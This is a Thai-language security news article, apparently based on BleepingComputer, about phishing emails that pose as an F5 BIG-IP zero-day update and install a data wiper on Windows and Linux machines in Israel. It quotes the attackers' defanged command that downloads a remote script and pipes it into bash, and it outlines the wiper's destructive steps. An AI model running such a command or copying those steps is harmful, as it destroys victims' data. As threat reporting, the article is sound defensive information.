Israel National Cyber Directorate เตือน พบอีเมลฟิชชิ่งที่แอบอ้างว่าเป็นการอัปเดตความปลอดภัย Zero-Day ของระบบ F5 BIG-IP ติดตั้งและทำงานได้บน Windows และ Linux

Israel's National Cyber Directorate (INCD) ของอิสราเอลทำหน้าที่เป็น Israel-CERT ที่มีหน้าที่รับผิดชอบในการปกป้องประเทศจากภัยคุกคามทางไซเบอร์และเตือนองค์กรและบริษัทรวมถึงภาคประชาชนเกี่ยวกับการโจมตีด้านไซเบอร์

ตั้งแต่เดือนตุลาคมที่ผ่านมา อิสราเอลตกเป็นเป้าหมายอย่างหนักโดยแฮกเกอร์ผู้สนับสนุนฝ่ายจากปาเลสไตน์และอิหร่าน ซึ่งดำเนินการขโมยข้อมูลและโจมตีเพื่อทำลายล้างข้อมูลในองค์กรต่างๆ ในประเทศอิสราเอล

ในเดือนพฤศจิกายน มีการค้นพบมัลแวร์สำหรับทำลายล้างข้อมูลตัวใหม่เรียกว่า BiBi Wiper ซึ่งสามารถติดตั้งและทำงานได้บนระบบปฏิบัติการ Linux และ Windows โดยเชื่อว่ามัลแวร์ตัวนี้สร้างขึ้นโดยแฮกเกอร์ที่สนับสนุนกลุ่มฮามาส

‍ซอร์ฟแวร์ F5 update deploys wiper

วานนี้ INCD เตือนถึงการโจมตีแบบฟิชชิ่งครั้งใหม่โดยใช้การหลอกลวงผ่านทางอีเมลโดยอ้างว่าเป็นคำเตือนเกี่ยวกับช่องโหว่แบบ Zero-Day ในอุปกรณ์ F5 BIG-IP

กลุ่ม hacktivist ที่สนับสนุนฝ่ายปาเลสไตน์ชื่อ Handala บอกกับ BleepingComputer ว่าพวกเขาเป็นผู้รับผิดชอบการโจมตีแบบฟิชชิ่ง โดยระบุว่ามันถูกนำไปใช้กับเครือข่ายของอิสราเอลหลายแห่ง แต่ BleepingComputer ไม่สามารถยืนยันการออกมารับผิดชอบในครั้งนี้ได้

อีเมลฟิชชิ่งเตือนว่าช่องโหว่แบบ Zero-day ของ F5 BIG-IP ถูกแพร่ประจายและใช้โจมตีอย่างต่อเนื่อง โดยมีลักษณะคือการหลอกลวงให้องค์กรอิสราเอลดาวน์โหลดและติดตั้งการอัปเดตความปลอดภัยก่อนที่เครือข่ายจะถูกละเมิด

‍

‍

สำหรับผู้ใช้ Windows ในอีเมลจะแนบไฟล์ปฏิบัติการชื่อ F5UPDATER.exe และสำหรับผู้ใช่้ Linux ไฟล์ดังกล่าวจะเป็น Shell Script ชื่อ update.sh มีลักษณะคือ wget -O - https[:]//sjc1[.]vultrobjects[.]com/f5update/update[.]sh | bash

เมื่อทำการเริ่มให้ซอร์ฟแวร์ทั้งเวอร์ชัน Windows และ Linux ทำงาน จะพยายามเลียนแบบการอัปเดตความปลอดภัย F5 โดยการแสดงโลโก้ของบริษัท F5 บนหน้าจอ

ตัวอย่างเช่น การล้างข้อมูลบน Windows จะแสดงหน้าจอขนาดเล็กที่มีโลโก้ F5 ซึ่งปลอมตัวเป็นโปรแกรมติดตั้งการอัปเดตความปลอดภัย ดังภาพด้านล่าง

เมื่อคลิกปุ่ม Update ซอร์ฟแวร์จะส่งข้อมูลของเครื่องที่กำลังจะดำเนินการลบข้อมูลไปยัง Telegram Channel และพยายามล้างข้อมูลทั้งหมดจากคอมพิวเตอร์เครื่องนั้น

อย่างไรก็ตาม ในการทดสอบของ BleepingComputer ซอร์ฟแวร์ลบข้อมูลนี้มี Bug อยู่เล็กน้อย โดยจะไม่สามารถลบข้อมูลทั้งหมดบนคอมพิวเตอร์ได้
และสำหรับการลบข้อมูลบนระบบ Linux คือ Shell Script นั้นจะทำการดาวน์โหลดโปรแกรมที่จำเป็นสำหรับการลบข้อมูลบนเครื่องมาทำงานเพิ่มเติม เช่น xfsprogs, wipe, และ parted เป็นต้น

ขั้นตอนการลบข้อมูลบนระบบ Linux นั้น จะเริ่มต้นโปรแกรมจะลบผู้ใช้ทั้งหมดในระบบ

• จากนั้นใช้คำสั่ง 'wipe' เพื่อลบ path ที่เกี่ยวข้องกับ Home Directory
• โปรแกมจะพยายามลบไฟล์ระบบปฏิบัติการทั้งหมดและ Partition บนระบบ Linux เมื่อเสร็จแล้วจะมีการสั่ง reboot เพื่อเริ่มต้นการทำงานของระบบปฏิบัติการใหม่ เพื่อให้การเปลี่ยนแปลงที่เกิดขึ้นกับ Partion บนระบบปฏิบัติการ Linux หลังเริ่มต้นระบบปฏิบัติการใหม่
• หลังจากนั้นเช่นเดียวกับที่ปัดน้ำฝน Windows คือระบบ Linux จะสื่อสารไปยัง Telegram Telegram Channel เพื่อให้ข้อมูลเกี่ยวกับอุปกรณ์และการอัพเดตสถานะต่างๆ ของเครื่องเหยื่อ

ปัจจุบันซอร์ฟเวอร์ลบล้างข้อมูลบนระบบปฏิบัติการกลายเป็นปัญหาใหญ่สำหรับอิสราเอล โดย hacktivist มักใช้สิ่งเหล่านี้ในการโจมตีแบบทำลายล้างเพื่อขัดขวางการดำเนินงานต่างๆและด้านเศรษฐกิจของอิสราเอล

และเช่นเคยการป้องกันตนเองที่ดีที่สุดคือการไม่ดาวน์โหลดไฟล์หรือดาวน์โหลดไฟล์จากอีเมลจากบุคคลหรือต้นทางจากแหล่งที่เชื่อถือได้และได้รับการยืนยันแล้วเท่านั้น
นอกจากนี้ควรดาวน์โหลดซอร์ฟแวร์การอัปเดตความปลอดภัยต่างๆ จากผู้จำหน่ายซอร์ฟแวร์หรือฮาร์ดแวร์โดยตรงเท่านั้น ไม่ใช่จากไซต์ภายนอกหรือเว็บไซต์ของบุคคลที่สามเป็นต้น

อ้างอิง Fake F5 BIG-IP zero-day warning emails push data wipers (bleepingcomputer.com)